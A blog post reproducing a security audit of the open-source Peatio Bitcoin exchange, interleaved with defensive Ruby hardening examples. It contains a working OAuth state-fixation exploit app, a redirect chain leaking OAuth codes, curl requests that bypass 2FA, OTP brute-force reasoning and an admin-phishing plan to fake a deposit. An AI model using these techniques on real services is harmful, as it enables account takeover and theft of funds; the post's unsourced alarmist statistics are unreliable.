ItsBlockchain
      Beware ! Your Bitcoins can be stolen at any point of time

      by Hitesh Malviya, March 4, 2020, in bitcoin, Cryptocurrency

      There are 2630 cryptocurrency exchanges available, and the list grows with each passing day. Which exchange should you choose to store your crypto assets? If you follow the bitcoin space, you must have heard about the hacking attack on the top Bitcoin exchange Bitfinex last year.

      If the best exchange could get hacked, how sure can we be about the others? This is an eye-opener post about the security of these exchanges. 75% of exchanges are still vulnerable to cyber attack and can be hacked at any point in time. You all must be waiting for the bitcoin price to go down; wait, my friend: one such cyber attack and the Bitcoin price will fall drastically.

      In this post I am going to present a case study on Bitcoin hacking done by Sakurity.

      UPDATE: Once again – no one was hacked in reality and the audit was conducted for free. This post is simply an attack scenario. You can download the final report and see clarifications here.

      For a while we’ve been looking for a project on which to conduct a volunteer security audit. Recently we found a perfect fit for us: an open source cryptocurrency exchange, Peatio, powered by Rails.

      We dedicated 8 hours to find a way to do the worst you can do with a Bitcoin exchange – steal the hot wallet. The mission was partially accomplished and we found an interesting chain of critical vulnerabilities.

      Step 1: Hijacking the account

      Peatio has a “Connect Weibo account” feature built in. According to the OAuth Security Cheatsheet, poorly implemented OAuth is a reliable way to take over an account.

      Connecting attacker’s weibo account to the victim’s Peatio account

      The omniauth-weibo-oauth2 gem was vulnerable to state fixation. We can set state to an arbitrary value (e.g. 123) and supply the attacker’s code along with state=123, which leads to the attacker’s Weibo being attached to the victim’s Peatio account. The exact same issue was in the omniauth-facebook gem and in other omniauth-based libraries that copy-pasted the same vulnerable code. It’s funny that the comment above says “to support omniauth-oauth2’s auto csrf protection” but does the opposite and switches it off.

      The bug can be exploited with the following Sinatra app; just add YourWeiboCookies:

      require 'sinatra'
      require 'faraday'

      # Request Weibo's authorize endpoint with the attacker's own cookies so the
      # Location header carries the attacker's code for the fixed state=123,
      # then forward the visiting browser to it.
      get '/get_weibo_cb' do
        conn = Faraday.new(url: 'https://api.weibo.com')
        new_url = conn.get do |r|
          r.url "/oauth2/authorize?client_id=456519107&redirect_uri=https%3A%2F%2Fyunbi.com%2Fauth%2Fweibo%2Fcallback&response_type=code&state=123"
          r.headers['Cookie'] = <<~COOKIE
            YourWeiboCookies
          COOKIE
          r.options.timeout = 4
          r.options.open_timeout = 2
        end.headers["Location"]
        redirect new_url
      end

      # Demo page: the first image starts the Peatio OAuth flow with the fixed
      # state, the second delivers the attacker's code to the callback.
      get '/peatio_demo' do
        response.headers['Content-Security-Policy'] = "img-src 'self' https://yunbi.com"
        "<img src='https://yunbi.com/auth/weibo?state=123'><img src='/get_weibo_cb'>"
      end
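As an added, defender-side example (not Sakurity’s, omniauth’s or Peatio’s code), here is a Ruby sketch of the difference between a callback that accepts whatever state it receives and one that binds a server-generated state to the session and checks it on return. The session Hash, the function names and the fixed attacker value 123 are assumptions made for the demonstration.

```ruby
require 'securerandom'

# Constant-time comparison so the state check does not leak by timing.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Vulnerable shape (state fixation): the callback never compares the state
# against anything the server issued, so an attacker can pick state=123 and
# deliver their own authorization code into the victim's session.
def fixated_callback(_session, params)
  return :rejected if params['state'].to_s.empty?
  { status: :linked, code: params['code'] }
end

# Hardened shape: state is generated server-side with a CSPRNG, stored in the
# victim's own session when the flow starts, consumed once, and must match.
# The session is a plain Hash standing in for the Rails session (assumption).
def begin_auth(session)
  session['oauth_state'] = SecureRandom.hex(16)
end

def secure_callback(session, params)
  expected = session.delete('oauth_state')   # one-time use: no replay
  return :rejected if expected.nil?
  return :rejected unless constant_time_equal?(expected, params['state'].to_s)
  { status: :linked, code: params['code'] }
end

if __FILE__ == $PROGRAM_NAME
  victim = {}
  attacker_params = { 'state' => '123', 'code' => 'ATTACKER_CODE' }  # constructed
  p fixated_callback(victim, attacker_params)   # linked: account takeover
  p secure_callback(victim, attacker_params)    # :rejected
  state = begin_auth(victim)
  p secure_callback(victim, 'state' => state, 'code' => 'VICTIM_CODE')  # linked
end
```

The important property is that the state value is never taken from the request alone: it exists only because this session started the flow, and it is deleted on first use, so a pre-chosen or replayed value is refused.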
      What if the user already has Weibo connected?

      The system is not going to connect another Weibo account, but we wanted the exploit to work seamlessly for every possible victim. So we hacked Weibo’s OAuth.

      First, we found out Weibo doesn’t whitelist redirect_uri, just as Github didn’t. It’s possible to change redirect_uri to another page on the victim domain to leak the code in the Referer header and then use it to log in to the victim’s account.

      However, there was no such page on Peatio to make it leak: no external images, links or anything. The attack surface was tiny. But then we found this in DocumentsController:

      if not @doc
        redirect_to(request.referer || root_path)
        return
      end
      

      The following chain of redirects leaks the code by putting it in the # fragment first.

      1. attacker_page redirects to weibo.com/authorize?...redirect_uri=https://app/documents/not_existing_doc%23...
      2. Weibo doesn’t properly parse redirect_uri and redirects the victim to https://app/documents/not_existing_doc#?code=VALID_CODE
      3. Peatio cannot find not_existing_doc and sends back a Location header equal to request.referer, which is still attacker_page (the browser retains this header while being redirected)
      4. The browser preserves the #?code=VALID_CODE fragment and loads attacker_page#?code=VALID_CODE. Now the code can be leaked with JS via the location.hash variable. The code can be used against https://app/auth/weibo/callback to log in to the victim’s account.

      So using the two bugs above we can hijack any Peatio account, and only the last one requires JS.
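Added example in Ruby, not part of the original write-up and not Peatio’s or Weibo’s code: two checks that break the redirect chain above, an exact-match redirect_uri check on the provider side and a same-origin check before DocumentsController follows request.referer. The names redirect_uri_allowed?, safe_return_path and ROOT_PATH, and the hosts used in the sample calls, are assumptions.

```ruby
require 'uri'

ROOT_PATH = '/'.freeze   # assumed stand-in for Rails root_path

# Provider-side check (assumed, not Weibo's implementation): the requested
# redirect_uri must equal the registered one exactly after parsing. A
# different path, any query string, or a fragment is refused, so a value like
# ".../documents/not_existing_doc%23..." never receives a code.
def redirect_uri_allowed?(registered, requested)
  reg = URI.parse(registered)
  req = URI.parse(requested)
  return false unless req.fragment.nil? && req.query.nil?
  [req.scheme, req.host, req.port, req.path] ==
    [reg.scheme, reg.host, reg.port, reg.path]
rescue URI::InvalidURIError
  false
end

# Client-side check for DocumentsController (assumed replacement for
# `redirect_to(request.referer || root_path)`): follow the Referer only when
# it is same-origin, and then only its path and query, never a full URL, so
# a fragment-carrying redirect cannot land on an attacker page.
def safe_return_path(referer, request_host)
  return ROOT_PATH if referer.nil? || referer.empty?
  uri = URI.parse(referer)
  return ROOT_PATH unless %w[http https].include?(uri.scheme) && uri.host == request_host
  path = uri.path.empty? ? ROOT_PATH : uri.path
  uri.query ? "#{path}?#{uri.query}" : path
rescue URI::InvalidURIError
  ROOT_PATH
end

if __FILE__ == $PROGRAM_NAME
  registered = 'https://app/auth/weibo/callback'
  p redirect_uri_allowed?(registered, 'https://app/documents/not_existing_doc%23')  # false
  p redirect_uri_allowed?(registered, registered)                                  # true
  p safe_return_path('https://attacker.example/page#?code=VALID_CODE', 'app')      # "/"
  p safe_return_path('https://app/markets?x=1', 'app')                            # "/markets?x=1"
end
```

Either check alone stops the specific chain described in the write-up; a provider that matches redirect_uri exactly never issues the code to the wrong path, and a client that only follows same-origin referers never redirects the fragment to a foreign page.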

      Step 2: Bypassing 2 Factor Authentication

      For users with Google Authenticator activated

      There’s a gaping hole in SmsAuthsController: two_factor_required! is only called for the show action, but not for update, which is actually responsible for activating SMS 2FA.

      before_action :auth_member!
      before_action :find_sms_auth
      before_action :activated?
      before_action :two_factor_required!, only: [:show]
      
      def show
        @phone_number = Phonelib.parse(current_user.phone_number).national
      end
      
      def update
        if params[:commit] == 'send_code'
          send_code_phase
        else
          verify_code_phase
        end
      end
      

      We can activate a new SMS authenticator simply by sending the following requests straight to the update action:

      curl 'https://app/verify/sms_auth' -H 'X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=' -H 'Cookie:_peatio_session=SID' --data '_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5Bphone_number%5D=9123222211&commit=send_code'

      curl 'https://app/verify/sms_auth' -H 'X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=' -H 'Cookie:_peatio_session=SID' --data '_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5Bphone_number%5D=9123222211&sms_auth%5Botp%5D=CODE_WE_RECEIVED'

      For users with both Authenticator and SMS

      Peatio doesn’t store failed attempts for OTP, so it’s very easy to bruteforce both App and SMS OTPs; it will take less than 3 days. For more details check our OTP Bruteforce Calculator.

      For users with SMS 2FA only

      The two_factor_by_type method doesn’t use the activated scope, so even inactive 2FA models can be used. Thus we are not going to brute-force SMS auth, because the victim would start receiving suspicious SMS. We can still bruteforce Google Authenticator because it has a seed generated and the verify? method works fine.

      def two_factor_by_type
        current_user.two_factors.by_type(params[:id])
      end
      
      Furthermore, SMS 2FA has two more issues:

      def gen_code
        self.otp_secret = OTP_LENGTH.times.map{ Random.rand(9) + 1 }.join
        self.refreshed_at = Time.now
      end
      

      The first issue is that Random.rand is based on a PRNG (Mersenne Twister), which is easily predictable once you have enough subsequently generated numbers.

      The second issue is that rand(9) can only generate numbers from 0 to 8, so the total number of combinations will be 9^6 = 531441, almost half of 1,000,000 and twice as easy to bruteforce as App 2FA.

      With the tricks outlined above we can bypass 2FA for any user. In the worst-case scenario it takes less than 3 days. If the victim has only Google Authenticator, it takes less than 5 seconds to set up a new SMS authenticator.
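Added example in Ruby (not Peatio’s code) covering the three OTP weaknesses of this section together: the keyspace of the vulnerable gen_code against a CSPRNG-based generator that uses all ten digits, and a verifier that refuses two-factor records that were never activated and counts failed attempts with a lockout, which is what makes brute-forcing feasible when it is missing. OtpVerifier, MAX_ATTEMPTS and the constant-time compare are assumptions; in a real application the failure counter would be persisted alongside the two-factor record.

```ruby
require 'securerandom'

OTP_LENGTH = 6

# As shown in the write-up: Random.rand(9) + 1 yields only the digits 1..9,
# drawn from the Mersenne Twister PRNG.
def gen_code_vulnerable
  OTP_LENGTH.times.map { Random.rand(9) + 1 }.join
end

# Hardened: CSPRNG, full 0..9 alphabet, zero-padded to a fixed length.
def gen_code_secure
  format("%0#{OTP_LENGTH}d", SecureRandom.random_number(10**OTP_LENGTH))
end

# Number of codes an attacker must cover for a given digit alphabet.
def otp_keyspace(alphabet_size, length = OTP_LENGTH)
  alphabet_size**length
end

def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Assumed verifier: refuses records that were never activated (the missing
# `activated` scope) and locks after MAX_ATTEMPTS consecutive failures (the
# missing failed-attempt storage).
class OtpVerifier
  MAX_ATTEMPTS = 5

  attr_reader :failures

  def initialize(secret, activated:)
    @secret = secret
    @activated = activated
    @failures = 0
  end

  def locked?
    @failures >= MAX_ATTEMPTS
  end

  def verify(candidate)
    return :inactive unless @activated
    return :locked if locked?
    if constant_time_equal?(@secret, candidate.to_s)
      @failures = 0
      :ok
    else
      @failures += 1
      :invalid
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "9-digit alphabet: #{otp_keyspace(9)} codes, 10-digit: #{otp_keyspace(10)}"
  puts "vulnerable: #{gen_code_vulnerable}  secure: #{gen_code_secure}"
  v = OtpVerifier.new(gen_code_secure, activated: true)
  6.times { v.verify('000000') }       # constructed wrong guesses
  puts "after repeated wrong guesses: #{v.verify('000000')}"   # :locked
end
```

With a lockout in place the attacker gets MAX_ATTEMPTS guesses per code lifetime rather than the whole keyspace, so the 9^6 versus 10^6 difference stops mattering; the CSPRNG change matters separately, because a predictable generator lets an observer skip guessing altogether.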

      Step 3: Attacking the admin

      Alright, we can hijack the account and bypass 2FA for any user, so we can steal the Bitcoins from anyone who visits our page. Still, we would need to trick a lot of users into clicking our phishy links. Let’s focus on just one of them: the admin.

      The simplest way to make the admin visit our link is to create a support ticket with something like “What is wrong with my account can you please check? https://i.will.hack.you/now”. Then we hack 2FA to get into the /admin panel:

      Unfortunately, this is the worst part. The admin of Peatio can do just a few more things than a regular user. Nothing like “Send all the coins to this bad guy” or “Show API keys of all users”.

        can :update, Proof
        can :manage, Document
        can :manage, Member
        can :manage, Ticket
        can :manage, IdDocument
        can :manage, TwoFactor
        can :menu, Deposit
        can :manage, Deposit
        can :manage, ::Deposits::Bank
        can :manage, ::Deposits::Satoshi
        can :menu, Withdraw
        can :manage, ::Withdraws::Bank
        can :manage, ::Withdraws::Satoshi
      

      The only thing we found is creating a fiat deposit of something like 99999999 Chinese Yuan and then accepting it as an admin.

      Then we can buy all available Bitcoins and altcoins and withdraw them. However, not all Bitcoins are on orders. Doing it in stealth mode for a week can bring better results than closing all the orders in a rush.

      Yunbi assets: 1636 BTC in total and ~350 in the hot wallet

      Our bounty: 1 BTC. It wasn’t about money though.

      Finally, the report is available to download.

      Hitesh Malviya

      Hitesh Malviya is the Founder of ItsBlockchain. He is one of the earliest adopters of blockchain and a cryptocurrency enthusiast in India. After being in the space for a few years, he started IBC in 2016 to help other early adopters learn about the technology.
      Before IBC, Hitesh founded 4 companies in the cyber security & IT space.

      Tags: bitcoin, cryptocurrency, exchange